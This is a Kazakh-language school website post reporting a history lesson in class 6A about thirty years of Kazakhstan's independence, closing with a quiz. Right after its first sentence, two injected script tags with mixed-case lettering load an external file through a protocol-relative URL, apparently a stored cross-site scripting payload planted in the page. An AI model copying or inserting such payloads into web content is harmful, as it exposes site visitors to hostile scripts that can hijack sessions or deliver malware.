Онкүндік жоспарына сәйкес 6 А сыныбында «Тәуелсіздік – таусылмас тарих» тақырыбында тарихи сағат өткізілді.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

13.12.2021

Іс-шараның басты мақсаты — Тәуелсіздіктің 30 жылдық мерейтойының маңыздылығын және Қазақстанның Тұңғыш Президенті – Елбасы Нұрсұлтан Назарбаевтың тәуелсіз мемлекеттің қалыптасуы мен дамуы жолында атқарған еңбегін жас ұрпаққа жеткізу. Сабақ барысында  оқушыларға ел Тәуелсіздігінің 30 жыл ішінде қол жеткен жетістіктері, еліміздің саяси-әлеуметтік ахуалы, білім мен мәдениет, тарих, рухани құндылықтар, ел бірлігі мен тыныштығы туралы мәліметтер айтылды.         «Тәуелсіздік барша қазақ үшін қасиетті ұғым. Егемендіктің арқасында қазіргі таңда бүкіл әлем таныған елге айналдық. Шетелге барып қай елде білім аламыз десек те жасалып жатқан мүмкіндік көп. Ата-бабаларымыз ақ найзаның ұшымен қорғап қалған тәуелсіздікті мәңгілік ету біздің борышымыз»-деп қорытындылай келіп сабақты «Қоржын - сұрақ» викторинасымен аяқтадым. Оқушылар белсенділік танытып сабақ жақсы деңгейде өтті.

Просмотров: 581


Пікір қосу



Деректерді қолтаңбаға қосу